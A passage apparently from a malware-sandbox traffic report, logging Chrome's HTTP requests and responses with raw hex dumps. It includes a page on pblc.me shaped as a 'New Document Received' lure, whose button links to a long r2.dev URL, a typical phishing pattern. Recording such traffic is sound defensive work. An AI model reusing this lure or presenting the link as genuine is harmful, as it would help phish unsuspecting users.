                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: JSESSIONID=4a13c21de71e3a5f
                                                                                                                                                                                                        2024-08-30 16:15:51 UTC516OUTData Raw: 62 65 6c 2e 37 3b 31 2c 32 2c 2c 62 63 33 2c 62 63 33 2c 62 2c 27 69 6e 69 74 69 61 6c 50 61 67 65 4c 6f 61 64 2c 27 68 74 74 70 73 3a 2f 2f 69 6e 64 64 2e 61 64 6f 62 65 2e 63 6f 6d 2f 76 69 65 77 2f 33 30 30 38 30 38 31 32 2d 33 36 65 39 2d 34 32 35 37 2d 61 37 36 63 2d 36 34 62 39 64 62 35 35 63 34 63 31 2c 31 2c 31 2c 2c 2c 21 21 21 21 27 35 38 65 33 30 39 39 37 2d 66 31 64 64 2d 34 36 64 65 2d 39 63 66 30 2d 33 39 30 30 30 61 36 38 38 61 37 66 2c 27 31 2c 35 70 6d 2c 36 32 74 3b 32 2c 2c 35 78 6e 2c 31 61 79 2c 32 2c 32 2c 27 47 45 54 2c 35 6b 2c 27 69 6e 64 64 2e 61 64 6f 62 65 2e 63 6f 6d 3a 34 34 33 2c 27 2f 76 69 65 77 2f 70 75 62 6c 69 63 61 74 69 6f 6e 2f 33 30 30 38 30 38 31 32 2d 33 36 65 39 2d 34 32 35 37 2d 61 37 36 63 2d 36 34 62 39 64 62
                                                                                                                                                                                                        Data Ascii: bel.7;1,2,,bc3,bc3,b,'initialPageLoad,'https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1,1,1,,,!!!!'58e30997-f1dd-46de-9cf0-39000a688a7f,'1,5pm,62t;2,,5xn,1ay,2,2,'GET,5k,'indd.adobe.com:443,'/view/publication/30080812-36e9-4257-a76c-64b9db
                                                                                                                                                                                                        2024-08-30 16:15:51 UTC312INHTTP/1.1 200
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 24
                                                                                                                                                                                                        date: Fri, 30 Aug 2024 16:15:51 GMT
                                                                                                                                                                                                        content-type: image/gif
                                                                                                                                                                                                        access-control-allow-origin: https://indd.adobe.com
                                                                                                                                                                                                        access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                        x-served-by: cache-ewr-kewr1740073-EWR
                                                                                                                                                                                                        2024-08-30 16:15:51 UTC24INData Raw: 47 49 46 38 39 61 01 00 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02
                                                                                                                                                                                                        Data Ascii: GIF89a,


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        14192.168.2.549757162.247.243.304436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:15:51 UTC922OUTGET /1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=15404&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1&be=3120&fe=14688&dc=7338&af=err,xhr,stn,ins,spa&perf=%7B%22timing%22:%7B%22of%22:1725034532666,%22n%22:0,%22f%22:3,%22dn%22:448,%22dne%22:448,%22c%22:448,%22s%22:449,%22ce%22:1211,%22rq%22:1211,%22rp%22:2667,%22rpe%22:2668,%22dl%22:2674,%22di%22:5839,%22ds%22:7337,%22de%22:7338,%22dc%22:14686,%22l%22:14687,%22le%22:14691%7D,%22navigation%22:%7B%7D%7D&fp=7402&fcp=7877&jsonp=NREUM.setToken HTTP/1.1
                                                                                                                                                                                                        Host: bam-cell.nr-data.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: JSESSIONID=4a13c21de71e3a5f
                                                                                                                                                                                                        2024-08-30 16:15:51 UTC495INHTTP/1.1 200
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 79
                                                                                                                                                                                                        date: Fri, 30 Aug 2024 16:15:51 GMT
                                                                                                                                                                                                        content-type: text/javascript
                                                                                                                                                                                                        cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                        access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                        access-control-expose-headers: Date
                                                                                                                                                                                                        timing-allow-origin: *
                                                                                                                                                                                                        set-cookie: JSESSIONID=4a13c21de71e3a5f; Path=/; Domain=.nr-data.net; Secure; SameSite=None
                                                                                                                                                                                                        x-served-by: cache-ewr-kewr1740022-EWR
                                                                                                                                                                                                        2024-08-30 16:15:51 UTC79INData Raw: 4e 52 45 55 4d 2e 73 65 74 54 6f 6b 65 6e 28 7b 27 73 74 6e 27 3a 30 2c 27 65 72 72 27 3a 31 2c 27 69 6e 73 27 3a 31 2c 27 73 70 61 27 3a 31 2c 27 73 72 27 3a 30 2c 27 73 72 73 27 3a 30 2c 27 73 74 27 3a 31 2c 27 73 74 73 27 3a 30 7d 29
                                                                                                                                                                                                        Data Ascii: NREUM.setToken({'stn':0,'err':1,'ins':1,'spa':1,'sr':0,'srs':0,'st':1,'sts':0})


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        15192.168.2.549758162.247.243.304436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:15:51 UTC538OUTGET /events/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=16315&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP/1.1
                                                                                                                                                                                                        Host: bam-cell.nr-data.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: JSESSIONID=4a13c21de71e3a5f
                                                                                                                                                                                                        2024-08-30 16:15:51 UTC291INHTTP/1.1 200
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 24
                                                                                                                                                                                                        date: Fri, 30 Aug 2024 16:15:51 GMT
                                                                                                                                                                                                        content-type: image/gif
                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                        access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                        x-served-by: cache-nyc-kteb1890062-NYC
                                                                                                                                                                                                        2024-08-30 16:15:51 UTC24INData Raw: 47 49 46 38 39 61 01 00 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02
                                                                                                                                                                                                        Data Ascii: GIF89a,


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        16192.168.2.549759162.247.243.304436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:15:59 UTC787OUTPOST /events/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=25436&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP/1.1
                                                                                                                                                                                                        Host: bam-cell.nr-data.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        Content-Length: 89
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        content-type: text/plain
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Origin: https://indd.adobe.com
                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Referer: https://indd.adobe.com/
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: JSESSIONID=4a13c21de71e3a5f
                                                                                                                                                                                                        2024-08-30 16:15:59 UTC89OUTData Raw: 62 65 6c 2e 36 3b 65 2c 27 66 70 2c 35 70 6d 2c 31 3b 36 2c 27 63 6c 73 2c 30 2e 3b 65 2c 27 66 63 70 2c 36 32 74 2c 31 3b 36 2c 31 2c 30 2e 3b 65 2c 27 6c 6f 61 64 2c 62 63 30 2c 31 3b 36 2c 31 2c 30 2e 30 30 30 30 32 38 39 34 30 37 36 36 34 39 31 32 30 31 32 34 36
                                                                                                                                                                                                        Data Ascii: bel.6;e,'fp,5pm,1;6,'cls,0.;e,'fcp,62t,1;6,1,0.;e,'load,bc0,1;6,1,0.000028940766491201246
                                                                                                                                                                                                        2024-08-30 16:15:59 UTC312INHTTP/1.1 200
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 24
                                                                                                                                                                                                        date: Fri, 30 Aug 2024 16:15:59 GMT
                                                                                                                                                                                                        content-type: image/gif
                                                                                                                                                                                                        access-control-allow-origin: https://indd.adobe.com
                                                                                                                                                                                                        access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                        x-served-by: cache-nyc-kteb1890061-NYC
                                                                                                                                                                                                        2024-08-30 16:15:59 UTC24INData Raw: 47 49 46 38 39 61 01 00 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02
                                                                                                                                                                                                        Data Ascii: GIF89a,


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        17192.168.2.549760162.247.243.304436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:00 UTC538OUTGET /events/1/a3d3f0e0e6?a=7895846&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=25436&ck=1&ref=https://indd.adobe.com/view/30080812-36e9-4257-a76c-64b9db55c4c1 HTTP/1.1
                                                                                                                                                                                                        Host: bam-cell.nr-data.net
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        Cookie: JSESSIONID=4a13c21de71e3a5f
                                                                                                                                                                                                        2024-08-30 16:16:00 UTC291INHTTP/1.1 200
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        Content-Length: 24
                                                                                                                                                                                                        date: Fri, 30 Aug 2024 16:16:00 GMT
                                                                                                                                                                                                        content-type: image/gif
                                                                                                                                                                                                        access-control-allow-origin: *
                                                                                                                                                                                                        access-control-allow-methods: GET, POST, PUT, HEAD, OPTIONS
                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                        x-served-by: cache-ewr-kewr1740068-EWR
                                                                                                                                                                                                        2024-08-30 16:16:00 UTC24INData Raw: 47 49 46 38 39 61 01 00 01 00 00 00 00 2c 00 00 00 00 01 00 01 00 00 02
                                                                                                                                                                                                        Data Ascii: GIF89a,


                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                        18192.168.2.549762172.67.129.2394436368C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                        2024-08-30 16:16:01 UTC648OUTGET /pub/40f029dddc28e3 HTTP/1.1
                                                                                                                                                                                                        Host: pblc.me
                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                                                                                                                        Sec-Fetch-Dest: document
                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                        2024-08-30 16:16:02 UTC1212INHTTP/1.1 200 OK
                                                                                                                                                                                                        Date: Fri, 30 Aug 2024 16:16:02 GMT
                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                        content-security-policy: img-src 'self' https: data:;script-src 'self' 'unsafe-inline';frame-ancestors *;default-src 'self';base-uri 'self';block-all-mixed-content;font-src 'self' https: data:;object-src 'none';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
                                                                                                                                                                                                        x-dns-prefetch-control: off
                                                                                                                                                                                                        expect-ct: max-age=0
                                                                                                                                                                                                        x-frame-options: SAMEORIGIN
                                                                                                                                                                                                        strict-transport-security: max-age=15552000; includeSubDomains
                                                                                                                                                                                                        x-download-options: noopen
                                                                                                                                                                                                        x-content-type-options: nosniff
                                                                                                                                                                                                        x-permitted-cross-domain-policies: none
                                                                                                                                                                                                        referrer-policy: no-referrer
                                                                                                                                                                                                        x-xss-protection: 0
                                                                                                                                                                                                        vary: Origin
                                                                                                                                                                                                        access-control-allow-credentials: true
                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bZGUNkUoi20IdgiEHKo5F3jJrJ2ir77uqRJPgdgYpysb%2FGFGRld0j4NUdgwOjAlDcNNqHHtochMR1YFxTg6TkuWqo8%2FztXXGmY2CSG3ifH6o4ISbRiPD%2BKwo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                        CF-RAY: 8bb6153b3acb42e9-EWR
                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                        2024-08-30 16:16:02 UTC1369INData Raw: 33 34 65 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 09 3c 68 74 6d 6c 3e 0a 09 09 3c 68 65 61 64 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20
                                                                                                                                                                                                        Data Ascii: 34ed<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><meta name="viewport" content="width=device-width"><meta http-equiv="Content-Type" content="text/html;
                                                                                                                                                                                                        2024-08-30 16:16:02 UTC1369INData Raw: 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 6e 6f 6e 65 3b 68 65 69 67 68 74 3a 31 30 30 25 3b 77 69 64 74 68 3a 31 30 30 25 21 69 6d 70 6f 72 74 61 6e 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 39 66 39 66 39 22 3e 0a 09 09 09 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 69 64 3d 22 74 65 6d 70 6c 61 74 65 43 6f 6c 75 6d 6e 73 22 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 39 66 39 66 39 22 3e 3c 74 62 6f 64 79 3e 3c 74 72 20 61 6c 69 67 6e 3d 22 63
                                                                                                                                                                                                        Data Ascii: kit-text-size-adjust:none;height:100%;width:100%!important;background-color:#f9f9f9"><table border="0" cellpadding="0" cellspacing="0" width="100%" id="templateColumns" style="margin:0 auto;text-align:left;background-color:#f9f9f9"><tbody><tr align="c
                                                                                                                                                                                                        2024-08-30 16:16:02 UTC1369INData Raw: 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 31 32 32 36 34 31 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 30 20 31 30 70 78 20 30 22 20 76 61 6c 69 67 6e 3d 22 74 6f 70 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 09 09 09 09 09 09 09 3c 70 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 34 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 2c 61 72 69 61 6c 2c 76 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f
                                                                                                                                                                                                        Data Ascii: ,sans-serif;color:#122641;padding:10px 0 10px 0" valign="top" align="center"><p style="width:100%;margin:0;padding:0;font-weight:700;display:block;line-height:1.5;font-size:34px;text-align:center;font-family:helvetica,arial,verdana,sans-serif;colo
                                                                                                                                                                                                        2024-08-30 16:16:02 UTC1369INData Raw: 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 34 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 2c 61 72 69 61 6c 2c 76 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 31 32 32 36 34 31 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 32 35 70 78 22 3e 4e 65 77 20 44 6f 63 75 6d 65 6e 74 20 52 65 63 65 69 76 65 64 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 09 09 09 09 09 09 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 62 6f 64 79 3e 3c 2f 74 61 62 6c 65 3e 0a 09 09 09 09 09 0a 09 09 09 09 09 09 3c 74 61 62 6c 65 20 77 69 64
                                                                                                                                                                                                        Data Ascii: t-weight:700;display:block;line-height:1.5;font-size:34px;text-align:center;font-family:helvetica,arial,verdana,sans-serif;color:#122641"><span style="font-size:25px">New Document Received</span></p></td></tr></tbody></table><table wid
                                                                                                                                                                                                        2024-08-30 16:16:02 UTC1369INData Raw: 6f 6d 3a 38 70 78 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 38 70 78 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 63 6f 6c 6f 72 3a 23 66 66 66 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 75 62 2d 65 31 63 36 66 33 64 38 35 64 35 31 34 30 32 37 39 30 32 32 37 36 38 34 33 36 33 61 63 35 32 63 2e 72 32 2e 64 65 76 2f 4f 46 46 31 33 32 34 34 37 38 35 36 37 36 38 38 37 34 33 37 36 34 37 36 34 37 38 37 34
                                                                                                                                                                                                        Data Ascii: om:8px;padding-top:8px;text-decoration:none"><a style="font-size:16px;font-weight:400;color:#fff;text-decoration:none;line-height:1.2;text-decoration:none" href="https://pub-e1c6f3d85d51402790227684363ac52c.r2.dev/OFF13244785676887437647647874
                                                                                                                                                                                                        2024-08-30 16:16:02 UTC1369INData Raw: 6d 6e 43 6f 6e 74 61 69 6e 65 72 22 3e 3c 74 61 62 6c 65 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 73 65 70 61 72 61 74 65 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 22 20 63 6c 61 73 73 3d 22 73 46 57 22 3e 3c 74 62 6f 64 79 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 22 3e 0a 09 09 09 09 09 09 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63
                                                                                                                                                                                                        Data Ascii: mnContainer"><table align="center" border="0" cellpadding="0" cellspacing="0" style="width:100%;display:table;border-collapse:separate;overflow:hidden;flex-grow:1" class="sFW"><tbody><tr><td style=""><table width="100%" border="0" cellpadding="0" c
                                                                                                                                                                                                        2024-08-30 16:16:02 UTC1369INData Raw: 25 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 62 6f 72 64 65 72 2d 63 6f 6c 6c 61 70 73 65 3a 73 65 70 61 72 61 74 65 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 66 6c 65 78 2d 67 72 6f 77 3a 31 22 20 63 6c 61 73 73 3d 22 73 46 57 22 3e 3c 74 62 6f 64 79 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 22 3e 0a 09 09 09 09 09 09 3c 74 61 62 6c 65 20 77 69 64 74 68 3d 22 31 30 30 25 22 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 3e 0a 09 09 3c 74 62 6f 64 79 3e 0a 09 09 09 3c 74 72 3e 0a 09 09 09 09 3c 74 64 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6c 69 6e 65
                                                                                                                                                                                                        Data Ascii: %;display:table;border-collapse:separate;overflow:hidden;flex-grow:1" class="sFW"><tbody><tr><td style=""><table width="100%" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td style="width:100%;font-weight:700;display:block;line
                                                                                                                                                                                                        2024-08-30 16:16:02 UTC1369INData Raw: 6f 6e 74 2d 73 69 7a 65 3a 33 34 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 2c 61 72 69 61 6c 2c 76 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 31 32 32 36 34 31 3b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 30 20 31 30 70 78 20 30 22 20 76 61 6c 69 67 6e 3d 22 74 6f 70 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 09 09 09 09 09 09 09 3c 70 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 34 70 78 3b 74 65
                                                                                                                                                                                                        Data Ascii: ont-size:34px;text-align:center;font-family:helvetica,arial,verdana,sans-serif;color:#122641;padding:10px 0 10px 0" valign="top" align="center"><p style="width:100%;margin:0;padding:0;font-weight:700;display:block;line-height:1.5;font-size:34px;te
                                                                                                                                                                                                        2024-08-30 16:16:02 UTC1369INData Raw: 70 61 64 64 69 6e 67 3a 31 30 70 78 20 30 20 31 30 70 78 20 30 22 20 76 61 6c 69 67 6e 3d 22 74 6f 70 22 20 61 6c 69 67 6e 3d 22 63 65 6e 74 65 72 22 3e 0a 09 09 09 09 09 09 09 3c 70 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 34 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 68 65 6c 76 65 74 69 63 61 2c 61 72 69 61 6c 2c 76 65 72 64 61 6e 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 31 32 32 36 34 31 22 3e 26 6e 62 73 70 3b 20 26 6e 62 73 70 3b 3c 2f
